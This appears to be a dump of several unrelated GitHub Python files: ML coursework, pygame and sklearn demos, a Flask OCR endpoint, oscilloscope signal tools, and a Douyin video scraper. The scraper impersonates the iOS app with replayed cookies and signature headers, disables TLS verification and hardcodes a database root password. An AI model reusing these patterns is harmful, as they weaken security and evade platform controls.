bg='white')\r\n#get.configure(bg=\"yellow\") #if you need to change the color\r\nget.pack()\r\n'''\r\n\r\n\r\nname_frame.pack()\r\n\r\nwindow.mainloop()\r\n\r\n","repo_name":"kathlynpurcell/using_tkinter","sub_path":"tkinter_gui.py","file_name":"tkinter_gui.py","file_ext":"py","file_size_in_byte":1700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"25178187937","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport collections\n\n\nwith open('training_data.txt') as f:\n training_data = [word for line in f for word in line.split()]\n\nwith open('test_data.txt') as f:\n test_data = [word for line in f for word in line.split()]\n\n# number of words in the entire training data\nN = len(training_data)\n\n#Word dictionary from train and test data\n\nvocabulary = training_data + test_data\n\nlist_set1 = set(vocabulary)\ndistinct_words = (list(list_set1))\nK = len(distinct_words)\nprint(K)\n\n\n# Task 1: Model Training, Prediction and Evaluation\n\nALPHA_PRIME = 5\nALPHA_0 = ALPHA_PRIME * 1.0 * K\n\n\nTRAINING_SETS = [N / 128, N / 64, N / 16, N / 4, N] # training sizes\n\n\nPERPLEXITY_MLE_TRAIN_ALL_SETS = []\nPERPLEXITY_MAP_TRAIN_ALL_SETS = []\nPERPLEXITY_PD_TRAIN_ALL_SETS = []\nPERPLEXITY_MLE_TEST_ALL_SETS = []\nPERPLEXITY_MAP_TEST_ALL_SETS = []\nPERPLEXITY_PD_TEST_ALL_SETS = []\n\n#Run loop for each training data size\nfor i in range(len(TRAINING_SETS)):\n\n N1 = int(TRAINING_SETS[i])\n # dictionary of word frequency in training data\n training_dic = {}\n\n for j in range(N1):\n training_dic[training_data[j]] = training_dic.get(training_data[j], 0.0) + 1.0\n\n p_ML = {}\n p_MAP = {}\n p_pd = {}\n for k in range(K):\n m_k = training_dic.get(distinct_words[k], 0.01)\n alpha_k = ALPHA_PRIME\n p_ML [distinct_words[k]] = m_k / N1\n\n p_MAP[distinct_words[k]] = (m_k + alpha_k - 1) / (N1 + ALPHA_0 - K)\n p_pd [distinct_words[k]] = (m_k + alpha_k) / (N1 + ALPHA_0)\n\n # Training perplexity for different models\n print(p_ML[distinct_words[k]])\n PERPLEXITY_MLE_TRAINING = 0.0\n PERPLEXITY_MAP_TRAINING = 0.0\n PERPLEXITY_PD_TRAINING = 0.0\n\n for j in range(N1):\n PERPLEXITY_MLE_TRAINING = PERPLEXITY_MLE_TRAINING + np.log(p_ML[training_data[j]])\n PERPLEXITY_MAP_TRAINING = PERPLEXITY_MAP_TRAINING + np.log(p_MAP[training_data[j]])\n PERPLEXITY_PD_TRAINING = PERPLEXITY_PD_TRAINING + np.log(p_pd[training_data[j]])\n C=(-1.0) / N1\n PERPLEXITY_MLE_TRAINING = np.exp(C*PERPLEXITY_MLE_TRAINING)\n PERPLEXITY_MAP_TRAINING = np.exp(C*PERPLEXITY_MAP_TRAINING)\n PERPLEXITY_PD_TRAINING = np.exp(C*PERPLEXITY_PD_TRAINING)\n\n PERPLEXITY_MLE_TRAIN_ALL_SETS.append(PERPLEXITY_MLE_TRAINING)\n PERPLEXITY_MAP_TRAIN_ALL_SETS.append(PERPLEXITY_MAP_TRAINING)\n PERPLEXITY_PD_TRAIN_ALL_SETS.append(PERPLEXITY_PD_TRAINING)\n\n # Test perplexity for differrent models\n\n PERPLEXITY_MLE_TEST = 0.0\n PERPLEXITY_MAP_TEST = 0.0\n PERPLEXITY_PD_TEST = 0.0\n N_test_data= len(test_data)\n for j in range(N_test_data):\n PERPLEXITY_MLE_TEST = PERPLEXITY_MLE_TEST + np.log(p_ML[test_data[j]])\n PERPLEXITY_MAP_TEST = PERPLEXITY_MAP_TEST + np.log(p_MAP[test_data[j]])\n PERPLEXITY_PD_TEST = PERPLEXITY_PD_TEST + np.log(p_pd[test_data[j]])\n C1=(-1.0) / N_test_data\n PERPLEXITY_MLE_TEST = np.exp(C1 * PERPLEXITY_MLE_TEST)\n PERPLEXITY_MAP_TEST = np.exp(C1 * PERPLEXITY_MAP_TEST)\n PERPLEXITY_PD_TEST = np.exp(C1 * PERPLEXITY_PD_TEST)\n\n PERPLEXITY_MLE_TEST_ALL_SETS.append(PERPLEXITY_MLE_TEST)\n PERPLEXITY_MAP_TEST_ALL_SETS.append(PERPLEXITY_MAP_TEST)\n PERPLEXITY_PD_TEST_ALL_SETS.append(PERPLEXITY_PD_TEST)\n\n\n\nprint(\"Task I: Model Training, Prediction and Evaluation \")\nprint(\"----------------------------------------------------------------\")\nprint(\"----------------------------------------------------------------\")\nprint(\"PERPLEXITY MLE TRAINING\")\nprint(\"Perplexities on training data N/128 -> \",PERPLEXITY_MLE_TRAIN_ALL_SETS[0])\nprint(\"Perplexities on training data N/64 -> \",PERPLEXITY_MLE_TRAIN_ALL_SETS[1])\nprint(\"Perplexities on training data N/16 -> \",PERPLEXITY_MLE_TRAIN_ALL_SETS[2])\nprint(\"Perplexities on training data N/4 -> \",PERPLEXITY_MLE_TRAIN_ALL_SETS[3])\nprint(\"Perplexities on training data N -> \",PERPLEXITY_MLE_TRAIN_ALL_SETS[4])\n\nprint(\"----------------------------------------------------------------\")\n\nprint(\"PERPLEXITY MLE TEST(TEST Data has 640000 words)\")\nprint(\"Perplexities on test using training data N/128 -> \",PERPLEXITY_MLE_TEST_ALL_SETS[0])\nprint(\"Perplexities on test using training data N/64 -> \",PERPLEXITY_MLE_TEST_ALL_SETS[1])\nprint(\"Perplexities on test using training data N/16 -> \",PERPLEXITY_MLE_TEST_ALL_SETS[2])\nprint(\"Perplexities on test using training data N/4 -> \",PERPLEXITY_MLE_TEST_ALL_SETS[3])\nprint(\"Perplexities on test using training data N -> \",PERPLEXITY_MLE_TEST_ALL_SETS[4])\n\nprint(\"----------------------------------------------------------------\")\nprint(\"----------------------------------------------------------------\")\nprint(\"PERPLEXITY MAP TRAINING\")\nprint(\"Perplexities on training data N/128 -> \",PERPLEXITY_MAP_TRAIN_ALL_SETS[0])\nprint(\"Perplexities on training data N/64 -> \",PERPLEXITY_MAP_TRAIN_ALL_SETS[1])\nprint(\"Perplexities on training data N/16 -> \",PERPLEXITY_MAP_TRAIN_ALL_SETS[2])\nprint(\"Perplexities on training data N/4 -> \",PERPLEXITY_MAP_TRAIN_ALL_SETS[3])\nprint(\"Perplexities on training data N -> \",PERPLEXITY_MAP_TRAIN_ALL_SETS[4])\n\nprint(\"----------------------------------------------------------------\")\n\nprint(\"PERPLEXITY MAP TEST (TEST Data has 640000 words)\")\nprint(\"Perplexities on test using training data N/128 -> \",PERPLEXITY_MAP_TEST_ALL_SETS[0])\nprint(\"Perplexities on test using training data N/64 -> \",PERPLEXITY_MAP_TEST_ALL_SETS[1])\nprint(\"Perplexities on test using training data N/16 -> \",PERPLEXITY_MAP_TEST_ALL_SETS[2])\nprint(\"Perplexities on test using training data N/4 -> \",PERPLEXITY_MAP_TEST_ALL_SETS[3])\nprint(\"Perplexities on test using training data N -> \" ,PERPLEXITY_MAP_TEST_ALL_SETS[4])\n\nprint(\"----------------------------------------------------------------\")\nprint(\"----------------------------------------------------------------\")\n\nprint(\"PERPLEXITY PD TRAINING\")\nprint(\"Perplexities on training data N/128 -> \",PERPLEXITY_PD_TRAIN_ALL_SETS[0])\nprint(\"Perplexities on training data N/64 -> \",PERPLEXITY_PD_TRAIN_ALL_SETS[1])\nprint(\"Perplexities on training data N/16 -> \",PERPLEXITY_PD_TRAIN_ALL_SETS[2])\nprint(\"Perplexities on training data N/4 -> \",PERPLEXITY_PD_TRAIN_ALL_SETS[3])\nprint(\"Perplexities on training data N -> \",PERPLEXITY_PD_TRAIN_ALL_SETS[4])\n\n\nprint(\"----------------------------------------------------------------\")\nprint(\"PERPLEXITY PD TEST (TEST Data has 640000 words)\")\nprint(\"Perplexities on test using training data N/128 -> \",PERPLEXITY_PD_TEST_ALL_SETS[0])\nprint(\"Perplexities on test using training data N/64 -> \",PERPLEXITY_PD_TEST_ALL_SETS[1])\nprint(\"Perplexities on test using training data N/16 -> \",PERPLEXITY_PD_TEST_ALL_SETS[2])\nprint(\"Perplexities on test using training data N/4 -> \",PERPLEXITY_PD_TEST_ALL_SETS[3])\nprint(\"Perplexities on test using training data N -> \",PERPLEXITY_PD_TEST_ALL_SETS[4])\n\nprint(\"----------------------------------------------------------------\")\nprint(\"----------------------------------------------------------------\")\n#Perplexity Plots\n\nplt.plot(TRAINING_SETS, PERPLEXITY_MLE_TRAIN_ALL_SETS,'mv--',label='MLE_train')\nplt.plot(TRAINING_SETS, PERPLEXITY_MLE_TEST_ALL_SETS,'m^--' ,label='MLE_test')\nplt.plot(TRAINING_SETS, PERPLEXITY_MAP_TRAIN_ALL_SETS,'cD-',label='MAP_train')\nplt.plot(TRAINING_SETS, PERPLEXITY_MAP_TEST_ALL_SETS,'cx--',label='MAP_test')\nplt.plot(TRAINING_SETS, PERPLEXITY_PD_TRAIN_ALL_SETS,'y*-' ,label='PD_train')\nplt.plot(TRAINING_SETS, PERPLEXITY_PD_TEST_ALL_SETS,'y8--' ,label='PD_test')\n\nplt.xlabel('N(training data size)')\nplt.ylabel('Perplexities')\nplt.title('The Perplexities on the train and test data under MLE,MAP And PD')\n\nplt.legend()\nplt.grid()\nplt.show()\n\n\n# Task 2: Model Selection\n\n\nALPHA_PRIME_list = range(1, 11, 1) #alpha parameter range\nN1 = N / 128 #training size\n\nPERPLEXITY_PD_TEST_ALL_SETS = []\n\nlog_evidence = []\nN1=int(N1)\nfor ALPHA_PRIME in ALPHA_PRIME_list:\n ALPHA_0 = K * ALPHA_PRIME\n\n #log evidence on training data\n\n temp_log_evidence = 0.0\n\n for k in range(N1):\n temp_log_evidence = temp_log_evidence + (-1.0) * np.log(ALPHA_0 + k)\n\n training_dic = {}\n\n for j in range(N1):\n training_dic[training_data[j]] = training_dic.get(training_data[j], 0) + 1\n\n #Perplexity on test data and log evidence on training data\n\n p_pd = {}\n\n for k in range(K):\n m_k = training_dic.get(distinct_words[k], 0.01)\n alpha_k = ALPHA_PRIME\n p_pd[distinct_words[k]] = (m_k + alpha_k) * 1.0 / (N1 + ALPHA_0)\n if (m_k >= 1):\n\n for i in range(m_k):\n temp_log_evidence += np.log(alpha_k + i)\n\n PERPLEXITY_PD_TEST = 0.0\n\n for j in range(len(test_data)):\n PERPLEXITY_PD_TEST = PERPLEXITY_PD_TEST + np.log(p_pd[test_data[j]])\n\n PERPLEXITY_PD_TEST = np.exp(PERPLEXITY_PD_TEST * (-1.0) / len(test_data))\n PERPLEXITY_PD_TEST_ALL_SETS.append(PERPLEXITY_PD_TEST)\n\n log_evidence.append(temp_log_evidence)\n\nPERPLEXITY_PD_TEST_ALL_SETS = [(int)(item) for item in PERPLEXITY_PD_TEST_ALL_SETS]\nlog_evidence = [(int)(item) for item in log_evidence]\n\n\n\nprint(\"----------------------------------------------------------------\")\nprint(\"Task II: Model Selection \")\nprint(\"----------------------------------------------------------------\")\nprint(\"The Perplexities on test set for ALPHA_PRIME = 1.0, ...., 10.0 \")\nfor k in range(10):\n print(\"Alpha \", k+1 ,\" Perplexity \",PERPLEXITY_PD_TEST_ALL_SETS[k])\n\nprint(PERPLEXITY_PD_TEST_ALL_SETS)\nfor k in range(10):\n print(\"log evidence \", k+1 ,\" \",log_evidence[k])\n\n\n#Task 2 plots\n\n#Task 2 plots\n\nplt.figure(1)\nplt.subplot(121)\nplt.plot(ALPHA_PRIME_list, PERPLEXITY_PD_TEST_ALL_SETS,'r*-')\nplt.xlabel('alpha prime')\nplt.ylabel('Perplexities on test data')\nplt.title('The Perplexities on the test data')\nplt.grid()\nplt.subplot(122)\nplt.plot(ALPHA_PRIME_list, log_evidence,'b*-')\nplt.xlabel('alpha prime')\nplt.ylabel('log evidence on training data')\nplt.title('log evidence ')\nplt.grid()\n\n\nplt.show()\n\n\n# Task 3: Author Identification\n\nfull_dic = {}\ntraining_dic = {}\n\n#Traing data pg121 reading\nwith open('pg121.txt.clean') as f:\n training = [word for line in f for word in line.split()]\nword_c_dict =collections.Counter(training)\ntraining_dic=dict(word_c_dict)\n\n\n#Reading test data in pg141\nwith open('pg141.txt.clean') as f:\n pg141 = [word for line in f for word in line.split()]\n\n#Reading test data in pg1400\n\nwith open('pg1400.txt.clean') as f:\n pg1400 = [word for line in f for word in line.split()]\n\nvocabulary = pg141 + pg1400 + training\nfull_c_dic =collections.Counter(vocabulary)\nfull_dic=dict(full_c_dic)\n\n\n\ntotal_words = full_dic.keys()\ntotal_words = list(total_words)\nK = len(total_words)\n\nN1 = len(training)\n\n\nALPHA_PRIME = 2.0\nALPHA_0 = K * ALPHA_PRIME\np_pd = {}\n\nfor k in range(K):\n m_k = training_dic.get(total_words[k], 0.01)\n alpha_k = ALPHA_PRIME\n p_pd[total_words[k]] = (m_k + alpha_k) * 1.0 / (N1 + ALPHA_0)\n\n# perplexity pg141\n\nPERPLEXITY_PD_TEST_ALL_SETS141 = 0.0\nPERPLEXITY_PD_TEST_ALL_SETS1400 = 0.0\n\nfor j in range(len(pg141)):\n PERPLEXITY_PD_TEST_ALL_SETS141 += np.log(p_pd[pg141[j]])\n\nPERPLEXITY_PD_TEST_ALL_SETS141 = np.exp(PERPLEXITY_PD_TEST_ALL_SETS141 * (-1.0) / len(pg141))\n\n# perplexity pg1400\nfor j in range(len(pg1400)):\n PERPLEXITY_PD_TEST_ALL_SETS1400 += np.log(p_pd[pg1400[j]])\n\nPERPLEXITY_PD_TEST_ALL_SETS1400 = np.exp(PERPLEXITY_PD_TEST_ALL_SETS1400 * (-1.0) / len(pg1400))\n\n\nprint(\"----------------------------------------------------------------\")\nprint(\"Perplexities on pg141.txt.clean\")\nprint(PERPLEXITY_PD_TEST_ALL_SETS141)\nprint(\"----------------------------------------------------------------\")\nprint(\"Perplexities on pg1400.txt.clean\")\nprint(PERPLEXITY_PD_TEST_ALL_SETS1400)","repo_name":"sbedekar25/Machine_Learning","sub_path":"PP1_Shantanu_Final.py","file_name":"PP1_Shantanu_Final.py","file_ext":"py","file_size_in_byte":11802,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"9674039287","text":"import json\nimport os\nfrom sqlalchemy import create_engine\nfrom sqlalchemy.orm import sessionmaker\nfrom Model import Work, Video\nimport requests\nfrom contextlib import closing\nimport time\n\n\ndef video_download(download_url, nickname, aweme_id):\n # 视频下载\n isotimeformat = '%Y-%m-%d'\n day = time.strftime(isotimeformat, time.localtime(time.time()))\n doc = './抖音视频/{}/{}'.format(day, nickname)\n if not os.path.exists(doc):\n os.makedirs(doc)\n\n filename = './抖音视频/{}/{}/{}.mp4'.format(day, nickname, aweme_id)\n try:\n with closing(requests.get(download_url, stream=True)) as r:\n chunk_size = 1024\n content_size = int(r.headers['content-length'])\n with open(filename, \"wb\") as f:\n n = 1\n for chunk in r.iter_content(chunk_size=chunk_size):\n f.write(chunk)\n n += 1\n print('下载视频: {}'.format(filename))\n\n if os.path.exists(filename):\n return filename\n else:\n return None\n\n except Exception as f:\n print(f)\n\n\ndef get_work():\n # 数据库位置\n engine = create_engine(\"mysql+pymysql://root:pythonman@127.0.0.1/TikTok?charset=utf8\")\n\n # 创建会话\n session = sessionmaker(engine)\n mySession = session()\n results = mySession.query(Work).all()\n\n for result in results:\n status = result.status\n if status == 0:\n id = result.id\n url = result.url\n host = result.Host\n connection = result.Connection\n x_tt_trace_id = result.x_tt_trace_id\n Cookie = result.Cookie\n X_Khronos = result.X_Khronos\n X_Gorgon = result.X_Gorgon\n\n headers = {\n 'Host':host,\n 'Connection': connection,\n 'sdk-version': '1',\n 'User-Agent': 'Aweme 7.7.0 rv:77019 (iPhone; iOS 12.3.1; zh_CN) Cronet',\n 'x-tt-trace-id':x_tt_trace_id,\n 'Accept-Encoding': 'gzip, deflate',\n 'Cookie': Cookie,\n 'X-Khronos': X_Khronos,\n 'X-Gorgon': X_Gorgon,\n }\n rsp = requests.get(url, headers=headers, verify=False, allow_redirects=False)\n if rsp.status_code == 200:\n nickname = ''\n data = json.loads(rsp.text)\n works = data['aweme_list']\n if works is None:\n pass\n else:\n for work in works:\n aweme_id = work['aweme_id']\n title = work['desc']\n nickname = work['author']['nickname']\n download_url = work['video']['play_addr']['url_list'][0]\n result = mySession.query(Work).filter_by(id=aweme_id).first()\n if result is None:\n try:\n result = mySession.query(Video).filter_by(aweme_id=aweme_id).first()\n if result is None:\n video_download(download_url, nickname, aweme_id)\n video = Video(aweme_id=aweme_id, nickname=nickname, title=title)\n mySession.add(video)\n mySession.commit()\n\n except Exception as f:\n print(f)\n pass\n else:\n print('视频已经存在')\n\n mySession.query(Work).filter(Work.id == id).update({\"status\": \"1\", \"user_name\":nickname})\n mySession.commit()\n\n\ndef run():\n get_work()\n\n\nif __name__ == '__main__':\n run()","repo_name":"nemonday/TikToKSpider","sub_path":"GetWork.py","file_name":"GetWork.py","file_ext":"py","file_size_in_byte":3850,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"2306936292","text":"import pygame\nimport random\n\n# Define some colors\nBLACK = (0, 0, 0)\nWHITE = (255, 255, 255)\nRED = (255, 0, 0)\n\n# Set the width and height of the screen [width, height]\nWIDTH = 700\nHEIGHT = 500\n\n# Initialize Pygame\npygame.init()\n\n# Set the size of the screen\nscreen = pygame.display.set_mode((WIDTH, HEIGHT))\n\n# Set the caption of the window\npygame.display.set_caption(\"Dynamic Obstacles\")\n\n# Define the class for the moving obstacles\nclass Obstacle(pygame.sprite.Sprite):\n def __init__(self, x, y, speed):\n super().__init__()\n self.image = pygame.Surface([30, 30])\n self.image.fill(RED)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n self.speed = speed\n\n def update(self):\n self.rect.x += self.speed\n if self.rect.right > WIDTH or self.rect.left < 0:\n self.speed = -self.speed\n\n# Define the class for the player\nclass Player(pygame.sprite.Sprite):\n def __init__(self, x, y):\n super().__init__()\n self.image = pygame.Surface([30, 30])\n self.image.fill(WHITE)\n self.rect = self.image.get_rect()\n self.rect.x = x\n self.rect.y = y\n\n def update(self, x, y):\n self.rect.x = x\n self.rect.y = y\n\n# Create a list of all the sprites\nall_sprites_list = pygame.sprite.Group()\n\n# Create a list of the moving obstacles\nobstacle_list = pygame.sprite.Group()\n\n# Create the player object\nplayer = Player(50, 50)\nall_sprites_list.add(player)\n\n# Create some initial obstacles\nfor i in range(5):\n x = random.randrange(WIDTH - 30)\n y = random.randrange(HEIGHT - 30)\n speed = random.randrange(1, 5)\n obstacle = Obstacle(x, y, speed)\n all_sprites_list.add(obstacle)\n obstacle_list.add(obstacle)\n\n# Set the clock for the game\nclock = pygame.time.Clock()\n\n# Start the game loop\ndone = False\nwhile not done:\n # --- Event Processing ---\n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n done = True\n\n # --- Game Logic ---\n # Get the mouse position and update the player\n pos = pygame.mouse.get_pos()\n player.update(pos[0], pos[1])\n\n # Update the moving obstacles\n obstacle_list.update()\n\n # --- Drawing ---\n # Clear the screen\n screen.fill(BLACK)\n\n # Draw all the sprites\n all_sprites_list.draw(screen)\n\n # --- Wrap-up ---\n # Update the screen\n pygame.display.flip()\n\n # Set the game's frame rate\n clock.tick(60)\n\n# Close the window and quit Pygame\npygame.quit()\n","repo_name":"22by7-raikar/Motion-Planning-in-Dynamic-Enviroment","sub_path":"PyGameEnvironments/DynamicObstacles1.py","file_name":"DynamicObstacles1.py","file_ext":"py","file_size_in_byte":2507,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"27817026741","text":"\"\"\"\n=========================================================\nClassification Example\n=========================================================\nThis example uses the `iris` dataset, in order to \ndemonstrate a classification technique. \nSupport Vector Classifier is used in the model.\n\nThe classification report and the confusion matrix are also generated\n\"\"\"\nprint(__doc__)\n\nfrom sklearn import datasets\nfrom sklearn.model_selection import train_test_split\nfrom sklearn import svm\nfrom sklearn.metrics import f1_score, classification_report, confusion_matrix\n\nimport pandas as pd\n\n# Get the data\niris = datasets.load_iris()\n\nfeatures = iris.data\nlabels = iris.target\n\n# Split the data for training and testing\nfeatures_train, features_test, labels_train, labels_test = train_test_split(features, labels, test_size=.5)\n\n# Train a Support Vector Classifier\nsv_classifier = svm.SVC()\nsv_classifier.fit(features_train, labels_train)\n\n# Test the classifier\npredictions = sv_classifier.predict(features_test)\n\n# Evaluate\nreport = classification_report(labels_test, predictions, target_names=iris.target_names)\nprint(report)\n\nconfusion_df = pd.DataFrame(confusion_matrix(labels_test, predictions),\n columns=[\"Predicted - \" + str(class_name) for class_name in iris.target_names],\n index = [\"Actual - \" + str(class_name) for class_name in iris.target_names])\n\nprint(confusion_df)","repo_name":"saikishandasari/a_for_ai","sub_path":"classification.py","file_name":"classification.py","file_ext":"py","file_size_in_byte":1376,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"29648766094","text":"import pytesseract\r\nfrom PIL import Image\r\nfrom flask import Flask, request\r\n\r\napp = Flask(__name__)\r\n\r\n@app.route(\"/web-photo-ocr.py\", methods=[\"POST\"])\r\ndef process_image():\r\n image_file = request.files[\"image\"]\r\n image = Image.open(image_file)\r\n text = pytesseract.image_to_string(image)\r\n\r\n return text\r\n\r\nif __name__ == \"__main__\":\r\n app.run(host=\"localhost\", port=8000)\r\n","repo_name":"mahavirprasad/photo-ocr","sub_path":"web-photo-ocr.py","file_name":"web-photo-ocr.py","file_ext":"py","file_size_in_byte":392,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"19"} +{"seq_id":"38908846403","text":"\"\"\"K. Miernik 2019\nk.a.miernik@gmail.com\nDistributed under GNU General Public Licence v3\n\nSome useful functions that could be used with pico_pet script and\nother setups.\n\n\"\"\"\nimport datetime\nimport numpy\nimport xml.dom.minidom\nfrom scipy.interpolate import CubicSpline\nfrom scipy.signal import find_peaks\n\n\ndef progress_bar(n, n_max, time_to_n=None):\n \"\"\"\n Show progress bar with arrow, completed percentage and optional\n current time and projected time to finish.\n \"\"\"\n print('\\r', end='')\n text = ''\n done = int(n / n_max * 40)\n text += ('[' + '=' * (done - 1) + '>' + '.' * (40 - done - 1) + ']' + \n ' {:>5.2f}% '.format((n / n_max) * 100))\n if time_to_n is not None:\n text += '{:>5.1f} s (est. {:>5.1f} s) '.format(time_to_n, \n time_to_n * n_max / n)\n print(text, end='', flush=True)\n\n\ndef get_number(text, default, number_type='float'):\n try:\n if number_type == 'float':\n r = float(text)\n else:\n r = int(text)\n except (AttributeError, ValueError):\n print('Warning, could not convert', text, 'to', number_type, \n 'reverting to default value')\n return default\n return r\n\n\ndef load_configuration(file_name):\n configuration = {}\n try:\n dom = xml.dom.minidom.parse(file_name)\n config = dom.getElementsByTagName('config')[0]\n\n hardware = config.getElementsByTagName('hardware')[0]\n\n samples = hardware.getElementsByTagName('samples')[0]\n configuration['timebase'] = get_number(\n samples.getAttribute('timebase'), 4, 'int')\n configuration['pre'] = get_number(\n samples.getAttribute('pre'), 100, 'int')\n configuration['post'] = get_number(\n samples.getAttribute('post'), 1000, 'int')\n configuration['captures'] = get_number(\n samples.getAttribute('captures'), 1, 'int')\n\n configuration['ch_range'] = get_number(\n samples.getAttribute('ch_range'), 1024, 'int')\n configuration['t_range'] = get_number(\n samples.getAttribute('t_range'), 100, 'int')\n\n trigger = hardware.getElementsByTagName('trigger')[0]\n configuration['trigger'] = {\n 'source' : trigger.getAttribute('source').upper(),\n 'direction' : trigger.getAttribute('direction').upper(),\n 'threshold' : get_number(trigger.getAttribute('threshold'), \n 0.0),\n 'autotrigger': get_number(trigger.getAttribute('autotrigger'),\n 0, 'int')\n }\n\n channels = hardware.getElementsByTagName('channel')\n for ch in channels:\n name = ch.getAttribute('name').upper()\n coupling = ch.getAttribute('coupling').upper()\n v_range = get_number(ch.getAttribute('range'), 1.0)\n offset = get_number(ch.getAttribute('offset'), 0.0)\n\n trapez = ch.getElementsByTagName('filter')[0]\n L = get_number(trapez.getAttribute('L'), 10, 'int')\n G = get_number(trapez.getAttribute('G'), 10, 'int')\n B = get_number(trapez.getAttribute('B'), 10, 'int')\n threshold = get_number(trapez.getAttribute('threshold'), 0.0)\n tau = get_number(trapez.getAttribute('tau'), 10)\n method = trapez.getAttribute('method')\n\n configuration[name] = { \n 'coupling' : coupling,\n 'range' : v_range,\n 'offset' : offset,\n 'filter' : {'L' : L, \n 'G' : G, \n 'tau' : tau,\n 'B' : B, \n 'method' : method,\n 'threshold': threshold\n }\n }\n\n analysis = config.getElementsByTagName('analysis')\n if len(analysis) > 0:\n channels = analysis[0].getElementsByTagName('channel')\n for ch in channels:\n name = ch.getAttribute('name').upper()\n calib = ch.getAttribute('calibration')\n calib = calib.split(',')\n calib_params = []\n for par in calib:\n calib_params.append(float(par))\n\n window = ch.getAttribute('window')\n window = window.split(',')\n window_params = []\n for par in window:\n window_params.append(float(par))\n\n configuration[name]['calib'] = calib_params\n configuration[name]['window'] = window_params\n coin = analysis[0].getElementsByTagName('coincidences')\n if len(coin) > 0:\n configuration['coin'] = get_number(\n coin[0].getAttribute('dt'), 1000.0)\n else:\n configuration['coin'] = 0.0\n\n except (ValueError, IndexError) as err:\n print(err)\n return False\n return configuration\n\n\ndef trapezoidal(v, params, clock, pileup='max'):\n \"\"\"\n Applies trapezoidal filter to a waveform v\n V.T. Jordanov NIMA 353 (1994) 261\n\n * params are a dictionary\n o params['filter']['B'] - baseline (number of samples in front \n taken to calculate average baseline)\n o params['filter']['L'] - length (in samples) see article for details\n o params['filter']['G'] - gap (in samples) see article for details\n o params['filter']['tau'] - signal decay constant\n o params['filter']['threshold'] - threshold for local maxima level \n in the filtered signal (see below)\n\n * pileup - mode of pileups treatment\n o 'max' - (default) take the maximum value from the filtered signal,\n this is the fastest, method but if there are pileups in\n the signal, all are rejected except of highest amplitude\n o 'all' - find all local maxima in the filtered signal above threshold\n threshold is calculated from threshold:\n Vtr * tau\n\n * returns A, s - amplitudes vector and filtered signal\n \"\"\"\n b = params['filter']['B']\n k = params['filter']['L']\n m = params['filter']['G']\n tau = params['filter']['tau']\n threshold = params['filter']['threshold']\n\n base = v[0:b].sum() / b\n N = len(v)\n d = numpy.zeros(N)\n p = numpy.zeros(N)\n r = numpy.zeros(N)\n s = numpy.zeros(N)\n l = k + m\n M = 1 / (numpy.exp(clock / tau) - 1)\n\n d[0] = v[0] - base\n p[0] = d[0]\n r[0] = p[0] + M * d[0]\n s[0] = r[0]\n\n for n in range(1, k):\n d[n] = v[n] - base\n p[n] = p[n-1] + d[n]\n r[n] = p[n] + M * d[n]\n s[n] = s[n-1] + r[n]\n\n for n in range(k, l):\n d[n] = v[n] - v[n-k]\n p[n] = p[n-1] + d[n]\n r[n] = p[n] + M * d[n]\n s[n] = s[n-1] + r[n]\n\n for n in range(l, l + k):\n d[n] = v[n] - v[n-k] - v[n-l] + base\n p[n] = p[n-1] + d[n]\n r[n] = p[n] + M * d[n]\n s[n] = s[n-1] + r[n]\n\n for n in range(l + k, N):\n d[n] = v[n] - v[n-k] - v[n-l] + v[n-l-k]\n p[n] = p[n-1] + d[n]\n r[n] = p[n] + M * d[n]\n s[n] = s[n-1] + r[n]\n\n if pileup == 'all':\n peaks, _ = find_peaks(abs(s / k), prominence=threshold * tau,\n distance=params['filter']['L'])\n return abs(s[peaks]) / k, s / k, peaks\n else:\n return [max(abs(s)) / k], s / k, numpy.argmax(abs(s))\n\n\n\ndef zero_crossing(trace, base=15, shift=10, chi=0.6, falling=True):\n \"\"\"\n Calculates trigger time based on zero crossing algorithm\n NIMA 775 (2015) 71–76\n\n * trace - a waveform to be analyzed\n * base - number of samples in front to calculate average baseline\n * shift - algorithm parameter (see article for more details)\n * chi - algorithm parameter (see article for more details)\n * falling - signal defaults to falling edge\n * returns trigger time in time stamps\n \"\"\"\n\n try:\n bs = numpy.average(trace[0:base])\n inv = numpy.zeros(trace.shape)\n inv[shift:] = trace[0:-shift] - bs\n zc = chi * (trace - bs) - inv\n if falling:\n zc *= -1\n t_lim, = numpy.unravel_index(zc.argmax(), zc.shape)\n t0 = numpy.argmax(zc[t_lim:] < 0) + t_lim\n\n t_zc = numpy.arange(t0 - 3, t0 + 3)\n y_zc = zc[t0-3:t0+3]\n cs = CubicSpline(t_zc, y_zc)\n r = cs.solve(0.0)\n\n for ri in r:\n if numpy.isreal(ri) and t_zc[0] < ri < t_zc[-1]:\n return ri\n except ValueError:\n pass\n return 0\n\n\n\ndef amplitude(s, params, clock, pileup='all'):\n if params['filter']['method'] == 'trapezoidal':\n A, sa, pa = trapezoidal(s, params, clock, pileup)\n else:\n baseline = s[0:params['B']].sum() / params['B']\n if params['filter']['method'] == 'sum':\n A = abs((s - baseline).sum()) / s.shape[0]\n else:\n A = max(abs(s - baseline))\n return A\n","repo_name":"kmiernik/PicoNuclear","sub_path":"src/PicoNuclear/tools.py","file_name":"tools.py","file_ext":"py","file_size_in_byte":9382,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"19"} +{"seq_id":"38121526351","text":"import pygame\r\n\r\n\r\nclass Score(pygame.sprite.Sprite):\r\n def __init__(self):\r\n super().__init__()\r\n self.step = 0\r\n self.points = 0\r\n self.font = pygame.font.Font(r\"assets\\fonts\\gamefont.ttf\", 20)\r\n self.image = self.font.render(f\"HI: {self.points}\", True, (83, 83, 83))\r\n self.rect = self.image.get_rect()\r\n surface = pygame.display.get_surface()\r\n self.rect.topright = (surface.get_width(), 0)\r\n\r\n def draw(self, surface):\r\n surface.blit(self.image, (550, 20))\r\n self.image = self.font.render(f\"HI: {self.points}\", True, (83, 83, 83))\r\n\r\n def update(self):\r\n self.step += 1\r\n 